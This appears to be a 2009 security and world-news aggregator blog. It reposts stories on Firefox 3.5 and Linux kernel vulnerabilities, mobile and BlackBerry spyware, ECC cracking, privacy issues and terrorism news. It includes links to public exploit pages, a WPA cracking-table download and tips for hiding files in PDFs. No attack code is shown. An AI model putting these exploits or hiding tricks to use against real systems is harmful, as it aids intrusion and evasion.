The soldier, whose identity has not yet been released by the Pentagon pending notification of members of Congress and the soldier's family, says his name, age and hometown on the video, which was released Saturday on a website pointed out by the Taliban. Two U.S. defence officials confirmed to The Associated Press that the man in the video is the captured soldier.

The soldier said the date is July 14. He says he was captured when he lagged behind on a patrol.

He is interviewed in English by his captors, and he is asked his views on the war, which he calls extremely hard, his desire to learn more about Islam and the morale of American soldiers, which he said was low.

Asked how he was doing, the soldier said on the video:

"Well I'm scared, scared I won't be able to go home. It is very unnerving to be a prisoner."

He begins to answer questions in a matter-of-fact and sober voice, occasionally facing the camera, looking down and sometimes looking to the questioner on his left.

He later chokes up when discussing his family and his hope to marry his girlfriend.

"I have my girlfriend, who is hoping to marry," he said. "I have a very very good family that I love back home in America. And I miss them every day when I'm gone. I miss them and I'm afraid that I might not ever see them again and that I'll never be able to tell them that I love them again and I'll never be able to hug them."

EPFL Playstation 3 Cluster Cracks 112-bit Elliptical Curve Encryption

Via H-Online.com -

Researchers at the École Polytechnique Fédérale (EPFL) in Lausanne, Switzerland, have succeeded in cracking 112-bit encryption based on elliptical curves (ECCp-112). They calculated the secret key associated with a public key by solving the Discrete Logarithm Problem (DLP) for elliptical curves, which displays a complexity of 2⁶⁰ for the numbers involved. The cracked ECC system is a set of parameters defined by the secp112r1 standard. That puts it at the lower end of the specifications for ECC encryption systems.

The computation required around half a year on the EPFL cluster, consisting of some 200 PlayStation 3s that had already served to calculate the MD5 collision for creating a fake SSL issuer certificate from RapidSSL. The ECC code designed for the cell processor of the PlayStation 3 was optimised several times during the computation period, and the researchers say that, if the optimised code had been running from the start, the computation would only have taken three and a half months. The previous record was set in 2002, when a distributed cluster consisting of around 10,000 PCs cracked an ECC key within 549 days. At that time, researchers at Notre Dame University cracked an ECCp-109 key, three bits shorter than the new record.

Dr. Arjen Lenstra, who took part in the EPFL project, told heise Security that this result isn't actually a threat to the EC encryption systems used in practice. He said the weakest encryption encountered is based on 160-bit ECC and future developments in encryption standards would in any case have to be based on at least 224-bit ECC. According to the NIST transition proposal, ECCp-160, whose encryption strength is comparable with RSA-1024, must be replaced with a stronger variant after 2010 in order to obtain FIPS certification.

See also:

• PlayStation 3 computing breaks 2^60 barrier, 112-bit prime ECDLP solved, publication by the EPFL researchers

Orwell in 2009: Dystopian Rights Management

Via EFF -

In George Orwell's Nineteen Eighty-Four, the protagonist Winston Smith labors in obscurity to make information appear and disappear at the whims of the Ministry of Truth:

This process of continuous alteration was applied not only to newspapers, but to books, periodicals, pamphlets, posters, leaflets, films, sound-tracks, cartoons, photographs — to every kind of literature or documentation which might conceivably hold any political or ideological significance. Day by day and almost minute by minute the past was brought up to date.

The Ministry of Truth would have truly appreciated DRM and tethered devices. As many owners of Kindle e-books discovered this morning, electronic books that come rigged with DRM "copy protection," stored on e-book readers subject to Amazon remote control, can be made to disappear at the whims of their publishers, as if they never existed in the first place.

David Pogue reports today in the New York Times that books published by MobileReference, including Orwell's Nineteen Eighty-Four and Animal Farm, were remotely deleted from customers' Kindles over night. (Customers had their accounts credited for the value lost.)

This morning, hundreds of Amazon Kindle owners awoke to discover that books by a certain famous author had mysteriously disappeared from their e-book readers. These were books that they had bought and paid for—thought they owned.

But no, apparently the publisher changed its mind about offering an electronic edition, and apparently Amazon, whose business lives and dies by publisher happiness, caved. It electronically deleted all books by this author from people’s Kindles and credited their accounts for the price.

Orwell would have appreciated the irony. But he also would have been the first to predict that this problem would arise when one company sells both the books themselves and the device required to read them, when that company insists on locking up the books with "protection" that prevents them being shifted to any other device, and has the power of "remote deletion" at its fingertips. Big Brother, indeed!

This is Amazon choosing its "content partners" over its customers. There is nothing about copyright law that required these deletions -- if Amazon didn't have the rights to sell the e-books in the first place, the infringement happened when the books were sold. Remote deletion doesn't change that, and it's not an infringement for the Kindle owner simply to read the book. Can you imagine a brick-and-mortar bookstore chasing you home, entering your house, and pulling a book from your shelf after you paid good money for it? (Nor, for that matter, does Amazon reserve any "remote deletion" right the Kindle "terms of service".)

If people want books that won't evaporate on the orders of faceless bureaucrats, if they want their libraries to last, or the right to read privately, or if they want the same ability to share or loan books that they enjoy with printed books, they should avoid buying any book that can't be copied or any e-book reader with "remote deletion" features. Project Gutenberg has e-books that won't disappear at midnight, like a pumpkin coach. Cory Doctorow sells e-books that will live as long as your hard drive and your backups keep them around. They're in unrestricted formats — like plain text, HTML, or PDF — and you can read them on devices without an Amazon Big Brother on board.

Mozilla Firefox 3.5.1 Unicode Data Remote Stack Buffer Overflow Vulnerability

I'm sorry to say, but this vulnerability isn't new. It was released two days before the release of 3.5.1

Various analysts and sites have recently confirmed the vulnerability in FireFox 3.5.1. When exploited, the vulnerability can lead to system compromise or induce a DOS.

http://www.milw0rm.com/exploits/9158
http://www.securityfocus.com/bid/35707
http://isc.sans.org/diary.html?storyid=6829

US, Afghan Forces Overrun Haqqani Network 'Encampment' in Paktia

Via The Long War Journal -

The US and Afghan military have continued attacks against the Haqqani Network in eastern Afghanistan despite a threat from the group that a captured US soldier would be executed if the raids did not cease.

Last night, US and Afghan forces conducted two major raids in Paktia and Logar provinces. The raids were aimed at taking down the leadership of the Haqqani Network and gathering intelligence on the location of the captured US soldier.

The biggest raid took place against an "enemy encampment" situated "in the remote reaches of Paktia province" the US military said in a press release. The operation took place about 20 miles southeast of Gardez City, and was designed to stem the flow of foreign fighters and weapons moving from Pakistan's Taliban-controlled tribal agencies of North and South Waziristan through the Khost-Gardez Pass to the capital of Kabul.

The combined force killed "several" Haqqani Network fighters in firefights and with air support after repeatedly taking fire while moving to assault the Haqqani base. Several massive weapons caches were destroyed after US and Afghan forces overran the base.

Afghan and Coalition forces also conducted a targeted raid against a Haqqani Network safe house near the village of Ebad in Logar province. The compound is known to be used by a Haqqani commander to make roadside bombs. Three suspected Haqqani Network fighters were detained during the raid.

The US military conducted the raids the same day that Mullah Sangeen Zadran, a senior commander in the Haqqani Network, threatened to kill a US soldier unless Coalition forces end operations in two districts in Paktika and Ghazni provinces in eastern Afghanistan. The soldier was captured on June 30 after walking away from his combat outpost in Paktika province.

The US military has issued flyers in Paktia and Ghazni provinces, urging Afghans to provide intelligence on the location of the missing soldier. But the soldier may have already been moved into North Waziristan, a US intelligence official familiar with the search told The Long War Journal.

[...]

Just as the US has finally admitted that Taliban leader Mullah Omar and his senior commanders are running their Afghan operations from Quetta in Pakistan, the Haqqanis have been labeled as operating from Pakistan's tribal areas.

"The Haqqani network remains one of the most lethal Taliban organizations operating out of Pakistan's Federally Administered Tribal Areas," the US military admitted in a recent press release.

New Linux Flaw Enables Null Pointer Exploits

Via ThreatPost.com -

A researcher has published exploit code for a new vulnerability he discovered in the Linux kernel. The vulnerability is an especially interesting one in that the researcher who discovered it, Brad Spengler, has demonstrated that he can use the weakness to defeat many of the add-on security protections offered by SELinux and AppArmor.

The vulnerability is in the 2.6.30 release of the Linux kernel, and in a message to the Daily Dave mailing list Spengler said that he was able to exploit the flaw, which at first glance seemed unexploitable. He said that he was able to defeat the protection against exploiting NULL pointer dereferences on systems running SELinux and those running typical Linux implementations. SELinux is a set of security enhancements to the Linux OS developed by the National Security Agency.

Spengler also said he is able to turn off the auditing processes in SELinux, AppArmor and the Linux Security Module. He posted a video demonstration of the exploit in action on YouTube.

[...]

This code looks perfectly ok, right? Well, it is, until the compiler takes this into its hands. While optimizing the code, the compiler will see that the variable has already been assigned and will actually remove the if block (the check if tun is NULL) completely from the resulting compiled code. In other words, the compiler will introduce the vulnerability to the binary code, which didn't exist in the source code. This will cause the kernel to try to read/write data from 0x00000000, which the attacker can map to userland – and this finally pwns the box.

Until recently, exploiting NULL pointer dereferences was thought to be virtually impossible. But work done by Mark Dowd of IBM ISS last year put the lie to that. Dowd designed his technique to exploit a problem in Adobe Flash, but was able to extend it to exploit similar conditions in other applications.

-----------------------

Prefect example of how you can't find all vulnerabilities by just reviewing source code alone.

While code review is critical to reducing the number of vulnerabilities, it is only part of the overall security puzzle.

Of course, the security puzzle changes so fast...there isn't a real solution...but that is another blog altogether ;)

Firefix 3.5.1 Released

http://www.mozilla.com/en-US/firefox/3.5.1/releasenotes/

Firefox 3.5.1 fixes the following issues:

• Several security issues.
• Several stability issues.
• An issue that was making Firefox take a long time to load on some Windows systems.

Please see the complete list of changes in this version. You may also be interested in the Firefox 3.5 release notes for a list of changes in the previous version.

Deadly Blasts Hit Two Luxury Hotels in Jakarta, Indonesia

Via CNN -

The death toll from bombings at two luxury hotels Friday morning in south Jakarta, Indonesia, has risen to eight, a presidential spokesman said. The number of wounded people was in the 40s, the spokesman said.

Antara News, a state-run agency, quoted a witness as saying he saw four foreigners among the wounded.

The Ritz-Carlton Hotel was to have accommodated soccer players from Manchester United of Britain, who are expected to arrive Saturday in Jakarta on Saturday.

The victims were taken to nearby MMC Hospital and Jakarta Hospital, the agency reported.

Police sealed off the area around both blasts, one of which occurred in the Ritz-Carlton Hotel and the other at the J.W. Marriott Hotel, about 50 meters away, about 7:50 a.m. (8:50 p.m. Thursday ET).

"There was a boom and the building shook, and then subsequently two more," said hotel guest Don Hammer, who was leaving his room in the Marriott when the blast occurred.

"The shocking part was entering the lobby, where the glass at the front of the hotel was all blown out and blood was spattered across the floor, but most people were leaving calmly."

[...]

Greg Woolstencroft had just walked past the hotels and had gone to his nearby apartment when he heard an explosion.

"I looked out my window and I saw a huge cloud of brownish smoke go up," he told CNN in a telephone interview. "I grabbed my iPhone to go downstairs ... and then the second bomb went off at the Ritz-Carlton, so I then ran around to the Ritz-Carlton and I was able to find that there had been a massive bomb that went off in this ... restaurant area and the explosion had blown out both sides of the hotel.

"I found inside the body of of what appears to be a suicide bomber, it looked like someone who had been a suicide bomber or someone who had been very, very close to the explosion.
"I also noticed that there were a number of injured people being taken off to hospital, but I only noticed one dead person at this point and time, that's all I saw. There has been extensive damage to both buildings, and at this point and time of course all the authorities are blocking up all the area and starting an investigation."

He added, "It's obviously targeted establishments where there are Westerners and expats ... I can only assume it's something to try and send a message."

---------------------------------

According to Stratfor....

Militant group Jemaah Islamiyah (JI) is a feasible perpetrator for the attacks.

Investigation Into Cyberattacks Stretches Around the Globe

Via PC World -

British authorities have launched an investigation into the recent cyberattacks that crippled Web sites in the U.S. and South Korea, as the trail to find the perpetrators stretches around the world.

On Tuesday, the Vietnamese security vendor Bach Khoa Internetwork Security (Bkis) said it had identified a master command-and-control server used to coordinate the denial-of-service attacks, which took down major U.S. and South Korean government Web sites.

A command-and-control server is used to distribute instructions to zombie PCs, which form a botnet that can be used to bombard Web sites with traffic, rendering the sites useless. The server was on an IP (Internet Protocol) address used by Global Digital Broadcast, an IP TV technology company based in Brighton, England, according to Bkis.

That master server distributed instructions to eight other command-and-control servers used in the attacks. Bkis, which managed to gain control of two of the eight servers, said that 166,908 hacked computers in 74 countries were used in the attacks and were programmed to get new instructions every three minutes.

But the master server isn't in the U.K.; it's in Miami, according to Tim Wray, one of the owners of Digital Global Broadcast, who spoke to IDG News Service on Tuesday evening, London time.

The server belongs to Digital Latin America (DLA), which is one of Digital Global Broadcast's partners. DLA encodes Latin American programming for distribution over IP TV-compatible devices, such as set-top boxes.

New programs are taken from satellite and encoded into the proper format, then sent over VPN (Virtual Private Network) to the U.K., where Digital Global Broadcast distributes the content, Wray said. The VPN connection made it appear the master server belonged to Digital Global Broadcast when it actually is in DLA's Miami data center.

Engineers from Digital Global Broadcast quickly discounted that the attacks originated with the North Korean government, which South Korean authorities have suggested may be responsible.

Digital Global Broadcast was notified of a problem by its hosting provider, C4L, Wray said. His company has also been contacted by the U.K.'s Serious Organized Crime Agency (SOCA). A SOCA official said she could not confirm or deny an investigation. DLA officials could not be immediately reached.

Investigators will need to seize that master server for forensic analysis. It's often a race against the hackers, since if the server is still under their control, critical data could be erased that would help an investigation.

"It's a tedious process and you want to do it as quickly as possible," said Jose Nazario, manager of security research for Arbor Networks.

Data such as log files, audit trails and uploaded files will be sought by investigators, Nazario said. "The holy grail you are looking for are pieces of forensics that reveal where the attacker connected from and when," he said.

To conduct the attacks, the hackers modified a relatively old piece of malware called MyDoom, which first appeared in January 2004. MyDoom has e-mail worm characteristics and can also download other malware to a PC and be programmed to conduct denial-of-service attacks against Web sites.

Analysis of the MyDoom variant used in the attacks isn't that impressive. "I still think the code is pretty sloppy, which I hope means they [the hackers] leave a good evidence trail," Nazario said.

Firefox 3.5.1 Due Later This Week

Via MozillaLinks.org -

Mozilla has confirmed that it will release the first update for Firefox 3.5 later this week to address a critical security vulnerability disclosed a couple of days ago that could lead to malicious code execution.

The update will most likely also address a bug related to slow startups due to large Windows temporary folders being scanned for Firefox’s randomness needs. However, some testers report the fix already available in a release candidate doesn’t improve the startup time, so it seems there are other possible causes and the fix may not help all users.

A second update (3.5.2) is already in the works and is expected for late July. This will address some bugs originally targeted for 3.5.1 that got postponed to speed Firefox 3.5.1 update.

Symbian Phone Trojan 'has Botnet Features'

Via ZDNet -

A piece of mobile malware has the capacity to enable a hacker to build a botnet of phones, according to security vendor Trend Micro.

The Symbian Trojan, which Trend Micro detects as SYMBOS_YXES.B, poses as a legitimate application called ACSServer.exe and calls itself 'Sexy Space'. It steals the user's subscriber, phone and network information, and connects to a website to send that information back to a hacker. It can also target the victim's contacts with spam SMS messages, and pull the content in those messages from the malicious website.

"In short, it appears to be a botnet for mobile phones," wrote Jonathan Leopando of the Trend Micro technical communications team in a blog post on Wednesday.

However, the malware itself is classified as low risk, with a low distribution potential, according to a Trend Micro analysis.

Leopando added that there may be a problem with digital signing by the Symbian Foundation. Digital signatures, which are cryptographic security features, are designed to provide a level of certainty that a message or piece of software actually comes from the organisation it appears to have come from.

However, Leopando wrote in the blog post that SYMBOS_YXES.B was similar to another phone malware that Trend Micro detects as SYMBOS_YXES.A, and that both pieces of malware had been signed by Symbian Foundation.

"The signing process — undertaken by the Symbian Foundation itself — is supposed to ferret out instances like this, but somehow this slipped through," wrote Leopando. "It may well be a coincidence, but it does not reinforce confidence in the signing system."

The Symbian Foundation had not responded to a request for comment at the time of writing.

Nmap 5.00 Released

http://nmap.org/5/

Insecure.Org is pleased to announce the immediate, free availability of the Nmap Security Scanner version 5.00 from http://nmap.org/. This is the first stable release since 4.76 (last September), and the first major release since the 4.50 release in 2007. Dozens of development releases led up to this.

Considering all the changes, we consider this the most important Nmap release since 1997, and we recommend that all current users upgrade.

--------------------

Ed Skoudis has a written on his first impressions of this huge release.

XKCD: Sheeple

http://xkcd.com/610/

Taliban Threatens to Kill U.S. Soldier Captured in Afghanistan

Via FoxNews (AP) -

A spokesman for a Taliban commander says a captured U.S. soldier will be executed unless the U.S. military stops operations in two districts of southeastern Afghanistan.

The Taliban said last week they were holding the soldier. The U.S. military earlier said he went missing and may be in enemy hands.

Abdullah Jalali, spokesman for Taliban commander Mawlavi Sangin, told The Associated Press on Thursday the soldier was healthy but threatened to kill him unless the U.S. stops airstrikes in Ghazni province's Giro district and Paktika province's Khoshamand district.

Jalali says Giro has been heavily bombed by international forces but did not otherwise explain why they chose those areas.

Teen Arrested for Upper East Side Starbucks Blast

Via NBCNewYork.com -

A teen arrested in the bombing of an upper East Side Starbucks was inspired to plant the explosive device by the movie "Fight Club," cops said today.

Kyle Shaw, 17, of Chelsea, was charged with arson, criminal mischief and criminal possession of a weapon for placing the bomb at the E. 92nd St. coffee shop, police said.

Shaw was inspired to plant the bomb at the Manhattan eatery by watching the anarchic behavior of Brad Pitt in the film "Fight Club." He picked the site because a Starbucks was a target in the movie, police said.

Shaw formed his own fight club in which boys beat one another in various locales around the city including Central Park, Police Commissioner Ray Kelly said.

At least one member got a broken nose, he said.

Shaw apparently told at least one friend to "watch the news over Memorial Day'' because he was about to launch his own version of "project mayhem,'' Kelly said. Investigators are looking into whether more people might have been involved.

The homemade device exploded at 3:30 a.m. on May 25 and no one was hurt in the attack. The bomb was made out of water bottle and powder used to make fireworks.

Video at the scene showed two teens carrying a plastic container with what cops believed to be explosives.

--------------------------

For more background information, check my May 25th blog entry on the blast...

Pay As You Drive “Black Boxes” Threaten Driver Privacy

Via EFF -

The California Department of Insurance (DOI) is considering regulations that would enable insurance prices to depend on the precise number of miles a car is driven in a given billing period. But in implementing these "Pay As You Drive" regulations, the DOI appears poised to empower insurance companies to require customers' cars to be outfitted with "black-box" devices that could transmit back to the insurance companies all sorts of data about car motion (acceleration, braking, and so forth) as well as driver behavior (steering and seat-belt wearing).

Although DOI has retreated from its prior position that these devices should track your location – a definite improvement – it's still true that every car already has a reliable, tamper-resistant device that verifies actual mileage: an odometer.

Even worse, there appear to be no restrictions on what the insurance companies would do with that data — of course, when you drive on the public street, you lose some privacy. But 10 years ago, someone interested in your whereabouts would have had to decide in advance to follow you and then physically follow you. Black boxes can collect information pervasively, silently, and cheaply for any later use by the insurance company, private parties or the government. There is real danger that this information would not only be used to ascertain the political or associational affiliations of drivers, but also to charge more if you drive and park in neighborhoods with high vehicle theft and crime rates, to impose higher premiums for people who drive at night or to link your health insurance rates with location data that reveals your lunchtime trips to McDonald's.

In comments filed with the DOI this week, EFF has argued that it is unacceptable for insurance companies to coercively require customers to accept such devices in their cars, and that the proposed regulations be amended to permit drivers to participate in any verifed actual mileage program via other means (like your car's odometer). EFF also argued that location privacy requires, at a minimum, that the proposed regulations restrict collection of information to the minimum amount necessary, require that the driver be able to independently verify information collected and require that the insurer have an explicit policy about the use and storage of the collected data.

Interested in protecting driver privacy in California? Consider telling Insurance Commissioner Steve Poizner [contact info] that you agree with EFF's criticisms. Why is the Insurance Commissioner allowing the insurance companies to track drivers? Shouldn't he be tracking insurance companies?

CERN LHC Update

Via US LHC Blog -

This message was sent from Director General Rolf Heuer to the CERN community today:

The foreseen shutdown work on the LHC is proceeding well, including the powering tests with the new quench protection system. However, during the past week vacuum leaks have been found in two “cold” sectors of the LHC. The leaks were found in sectors 8-1 and 2-3 while they were being prepared for the electrical tests on the copper stabilizers at around 80 K. In both cases the leak is at one end of the sector, where the electrical feedbox, DFBA, joins Q7, the final magnet in the sector.

Unfortunately, the repair necessitates a partial warm-up of both sectors. This involves the end sub-sector being warmed to room temperature, while the adjacent sub-sector “floats” in temperature and the remainder of the sector is kept at 80 K. As the leak is from the helium circuit to the insulating vacuum, the repair work will have no impact on the vacuum in the beam pipe. However the intervention will have an impact on the schedule for the restart. It is now foreseen that the LHC will be closed up and ready for beam injection by mid-November.

---------------------------

Liquid nitrogen is used to cool 37,000 tonnes of equipment for the Large Hadron Collider (LHC) down to 80 K. Then liquid helium is used to chill some parts of the accelerator to temperatures as low as 1.8 K.

But liquid helium isn't created directly....

The cryoplants produce high-pressure supercritical helium gas at 4.6 K, which will be distributed along the sector to a number of local cooling loops. There, the supercritical helium will be expanded into a lower-pressure environment, which causes it to liquefy at either 4.5 K or 1.8 K. This liquid will then be used to cool the superconducting magnets.

Firefox 3.5 Exploits - Another Exploit Released

The one you have been hearing about....here & here
http://www.milw0rm.com/exploits/9137

and a new exploit one released today...
http://www.milw0rm.com/exploits/9158

Veracode: BlackBerry Spyware Dissected

Via Veracode Blog -

Yesterday it was reported by various media outlets that a recent BlackBerry software update from Etisalat (a UAE-based carrier) contained spyware that would intercept emails and text messages and send copies to a central Etisalat server. We decided to take a look to find out more.

We’re not sure why the software was delivered in both .jar and .cod form. The .cod file is a RIM proprietary format that contains the compiled Java classes along with a signature. Therefore it’s not even necessary to send the .jar, but they did, completely unobfuscated.

[...]

The most alarming part about this whole situation is that people only noticed the malware because it was draining their batteries. The server receiving the initial registration packets (i.e. “Here I am, software is installed!”) got overloaded. Devices kept trying to connect every five seconds to empty the outbound message queue, thereby causing a battery drain. Some people were reporting on official BlackBerry forums that their batteries were being depleted from full charge in as little as half an hour.

The final thing to mention is that the spyware does appear to be installed in a non-running state by default, where it’s not actually exfiltrating data once the initial registration packet has gone out. However, using the command and control mechanism we described earlier, the carrier can remotely start/stop the service at will on a per-device basis.

-------------------------

Check out the full Veracode blog for the detailed technical analysis...cool stuff indeed.

New iTunes From Apple Halts Palm Pre's Access

Via WSJ.com -

The latest version of iTunes from Apple Inc. (AAPL) has cut off rival Palm Inc.'s (PALM) Pre smartphone.

Apple's online music and video bazaar now "disables devices falsely pretending to be iPods," which includes Palm's Pre, an Apple spokesman said.

The Pre smartphone has been able to access iTunes since going on sale in the U.S. in early June. But it was always unclear whether the Pre was doing so with Apple's permission. Given the latest iTunes update, Palm appears to have been acting on its own.

The development is a negative one for Palm, which is counting on Pre sales to turn around the company. With the move, Apple has dramatically limited one of the Pre's key competitive advantages: downloading music and videos from Apple's iTunes.

"If Apple chooses to disable media sync in iTunes, it will be a direct blow to their users who will be deprived of a seamless synchronization experience," Palm spokesman Lynn Fox said,

"However, people will have options," which include using previous versions of iTunes that are still Pre-compatible, she added.

For Apple, the new iTunes underscores its commitment to allow only authorized devices, such as its iPods and iPhones, to access its iTunes music store, which helps it corral more of the profits.

"As we've said before, newer versions of Apple's iTunes software may no longer provide syncing functionality with unsupported digital media players," the Apple spokesman added.

---------------------

If you didn't hear about the Palm Pre Media Sync function and how it gained access to iTunes, check here.

Critical JavaScript Vulnerability in Firefox 3.5

http://blog.mozilla.com/security/2009/07/14/critical-javascript-vulnerability-in-firefox-35/

Issue

A bug discovered last week in Firefox 3.5’s Just-in-time (JIT) JavaScript compiler was disclosed publicly yesterday. It is a critical vulnerability that can be used to execute malicious code.

Impact

The vulnerability can be exploited by an attacker who tricks a victim into viewing a malicious Web page containing the exploit code. The vulnerability can be mitigated by disabling the JIT in the JavaScript engine. To do so:

1. Enter about:config in the browser’s location bar.
2. Type jit in the Filter box at the top of the config editor.
3. Double-click the line containing javascript.options.jit.content setting the value to false.

Note that disabling the JIT will result in decreased JavaScript performance and is only recommended as a temporary security measure. Once users have been received the security update containing the fix for this issue, they should restore the JIT setting to true by:

1. Enter about:config in the browser’s location bar.
2. Type jit in the Filter box at the top of the config editor.
3. Double-click the line containing javascript.options.jit.content setting the value to true.

Alternatively, users can disable the JIT by running Firefox in Safe Mode. Windows users can do so by selecting Mozilla Firefox (Safe Mode) from the Mozilla Firefox folder.

Status

Mozilla developers are working on a fix for this issue and a Firefox security update will be sent out as soon as the fix is completed and tested.

Credit

Zbyte reported this issue to Mozilla and Lucas Kruijswijk helped reduce the exploit test case.

-----------------------------------

HD Moore has released a MSF module which exploits the vulnerability on Win32 only...support for other platforms is expected in the new future.

Etisalat's BlackBerry Patch Opens Phones to Surveillance

Via ITP.net -

The battery-sapping "performance patch" that Etisalat [Emirates Telecommunications Corporation] sent to its BlackBerry subscribers over the last few days was designed to give the UAE operator the ability to read its customers emails and text messages, a Qatar-based software expert told CommsMEA yesterday.

Last week, Etisalat told its 100,000 BlackBerry subscribers that a "performance enhancement patch" would be sent to them to "provide the best BlackBerry service and ultimate experience". But users who downloaded the software complained of dramatically reduced battery life and slower than usual performance of their devices.

Nigel Gourlay, a Doha-based Sun-certified Java programmer who has been developing open source software for 15 years, analysed the patch after it was posted on BlackBerry’s community support forum and he said that once installed, it potentially gives Etisalat the power to view all emails and text messages sent from the BlackBerry.

“I don’t think it’s been designed for a large scale deployment,” he said. “They have released it as an upgrade across all UAE BlackBerry handsets, all of which have tried to phone home to this one registration server at the same time, and that has effectively brought the server to its knees. When the BlackBerry cannot register itself, it tries again and this causes the battery drain.”

Gourlay pointed out that by default the system is turned off and when it installs the only message that is sent is an initial registration message, and that later on, Etisalat could turn on the systems “one by one”.

Once installed, one of the possible commands that can be sent to the device is "start", which would then cause any subsequent message to be forwarded to an Etisalat website.

Gourlay said the patch was stamped with “SS8.com”, the name of a US-based software developer that describes itself as an electronic surveillance solutions company that develops products that “allow intelligence agencies to recognise, monitor, investigate and prevent criminal activity”.

It appears as though the use of such software is widespread among telecom operators, and according to SS8’s website, its products are used by “some of the largest service providers in the world”.

On Sunday Etisalat issued a two paragraph statement apologising for “a phased software upgrade…that led to extra consumption of the handset battery”. It described the patch as a “routine upgrade process”, but said it had stopped issuing it as a precautionary measure.

At the time of writing the operator had not responded to requests sent yesterday (Monday) for further details about the precise purpose of the patch or Etisalat’s relationship with “lawful interception solutions” firm SS8.

SS8 established its presence in the UAE in February this year when it acquired OCI Mobile, a technology provider that specialised in providing surveillance solutions to government organisations.

Cisco 2009 Midyear Security Report

The Cisco 2009 Midyear Security Report presents an overview of Cisco security intelligence, highlighting threat information and trends from the first half of 2009. The report also includes recommendations from Cisco security experts and predictions of how identified trends will evolve.

As predicted in the Cisco 2008 Annual Security Report, attacks are only becoming more sophisticated and targeted as we move through 2009—and the global recession. However, while cybercrime is more pervasive, there are encouraging signs that increased collaboration among the "good guys" is not only making it more difficult for attacks to take root and grow, but also helping to bring criminals to justice.

Report Highlights

• Criminals are exploiting "old-school" vulnerabilities because they believe security experts and individual computer users are paying little attention to these types of threats.
• Compromising legitimate websites for the purpose of propagating malware remains a highly effective technique for criminals.
• Web 2.0 applications, prized for their ease of use and flexibility, have become lures for criminals.
• Criminals are targeting people who use online banking with well-designed, localized text message scams—and they're leaving virtually no trail.
• The Obama administration has made strengthening U.S. cybersecurity a high priority, and looks to leverage technology innovation and partner with the private sector. Other countries are also stepping up efforts to enhance cybersecurity and prevent cybercrime.
  

In addition, the number of vulnerabilities and discrete threats has been off to a slower start this year compared to 2008, according to research by Cisco-a sign the security community is succeeding in making it more difficult for attacks to take root and grow.

The Cisco 2009 Midyear Security Report (PDF) is now available.

Embedding and Hiding Files in PDF Documents

Via Didier Stevens' Blog -

My corrupted PDF quip inspired me to program another steganography trick: embed a file in a PDF document and corrupt the reference, thereby effectively making the embedded file invisible to the PDF reader.

The PDF specification provides ways to embed files in PDF documents. I’m releasing my Python program to create a PDF file with embedded file (I used make-pdf-embedded.py to create my EICAR.pdf).

[...]

Of course, once you know the stego trick, it’s easy to recover the embedded file: edit the PDF document with an hex editor and change the case back to /EmbeddedFiles.

But if you want to make it harder to detect, use PDF obfuscation techniques. Or embed the file twice with incremental updates. First version is the file you want to hide, second version is a decoy…

The PDF language offers so many features to hide and obfuscate data!

Download: make-pdf_V0_1_2.zip (https)

MD5: 305D57692C27DD3CD91D8C85A3932948

SHA256: A030BBCB8B54137D8047A4CB5C350725599383A4B113CABBA8871AC221378C5B

China Stops Clinic Treating Internet Addiction With Electroshock

Via WSJ's China Journal Blog -

Chinese authorities have put to a stop one clinic’s extreme effort to wean youngsters away from the Internet — a practice that highlights the skepticism surrounding China’s approach to Internet addiction, as well as the existence of the condition itself.

The Ministry of Health ordered that the clinic in Shandong province stop using electroshock as a form of punishment, according to Chinese media. Electroshock therapy was administered as a punishment for violating any number of the center’s rules. But the government said the treatment hasn’t been proven safe, while outsiders questioned whether the practice was effective in getting young people away from their compulsion to spend significant time online.

In what might be an indication of the clinic’s effectiveness, its practices came to light when former patients went online to complain. They described restrictive living conditions — including being allowed to talk only about their addiction and being forced to kneel in front of their parents in obedience — that scarcely squared with the clinic’s way out, which for them merely meant declaring they had overcome their addiction.

China claims the world’s largest online population, and a visit to an Internet cafe in most mainland cities would show what a major share of young people like do to with their free time. That’s given rise to fears that many in China suffer from Internet addiction. While not officially recognized as a malady by China’s medical establishment, the issue has drawn concerns from both the public and some officials, which have sanctioned treatment facilities and issued guidelines on how to deal with Internet addiction.

But sizable chunk of China’s online population is skeptical of the claims. Their doubts are reflected within the professional community, where the concept of Internet addiction has gained traction but still faces doubters who point to a lack of hard data.

Russia Tests 2nd Sub-launched Ballistic Missile

Via CBSNews.com (AP) -

News agencies say Russia has successfully tested its second submarine-launched ballistic missile in as many days.

RIA-Novosti and Interfax quote the head of Russia's joint chief of staff as saying a Sineva-type missile was fired Tuesday from the submarine Bryansk near the White Sea.

Gen. Nikolai Makarov was quoted as saying it was a short-range test for the Sineva.

Russia is struggling to introduce the newer, more-sophisticated Bulava missile into service, but it has failed in five of 10 launches.

Russian leaders say the Bulava will be able to penetrate missile defenses and will be a key part of the military's future nuclear arsenal.

----------------------

According to RIA-Novosti (July 14th, 2009),

The RSM-54 Sineva (NATO codename SS-N-23 Skiff) is a third-generation liquid-propellant intercontinental ballistic missile that entered service with the Russian Navy in July 2007. It can carry four to 10 nuclear warheads, depending on the modification. Russia is planning to equip its Delta IV class submarines with at least 100 Sineva missiles.

Navy commander Adm. Vladimir Vysotsky recently said Russia would carry out the next test of a Bulava sea-launched ballistic missile in late July, one of a total of four or five launches this year.

Offensive-Security WPA Rainbow Tables

http://www.offensive-security.com/wpa-tables/

Cowpatty WPA tables, SSID Specific, using a 49 Million WPA optimised password dictionary file

Each Table is 1.9 GB. Please help by seeding these files

Pepper Spray-Armed ATM Misfires, Shoots Workers

Via Wired.com -

A South African bank has outfitted its ATMs with pepper spray to prevent criminals from bombing or tampering with the machines. But the system still has some bugs: One of the machines released its stinging payload on three maintenance workers last week.

Absa Bank, one of South Africa’s largest, installed the spray on 11 machines after someone bombed several of its ATMs last year, according to local news outlet Independent Online. They were installed in a region where authorities say they retrieved 40 skimmers from card machines last year.

If a camera on the machine detects someone tampering with the card slot in an attempt to install a skimming device or explosives, a mechanism installed at the ATM kiosk releases a cloudspray.

The hope is that the spray will disorient the culprit long enough to allow authorities to arrive at the scene. But during routine maintenance on one of the machines, three workers were maced instead and had to be treated.

The spray was installed on machines in the Western Cape, a popular tourist area.

-------------------------

Speaking of ATMs, it looks like they found some more malware infected ATMs in Belarus.

All of the ATMs thus confirmed infected belong to banks which have contracts with Belorussian Processing Center (BPTs), which would lead one to conclude the insider had access there. This is impossible to confirm, however, as the banks are silent and BPTs denies their machines are infected at all, insisting instead that the missing funds were caused by a "technical failure," and subsequently "defective software". BPTs went so far as to tell reporters on June 5th that these technical issues had been resolved, but victims continue to report lost funds.

First Zero Day Exploit for Firefox 3.5

Via h-online.com -

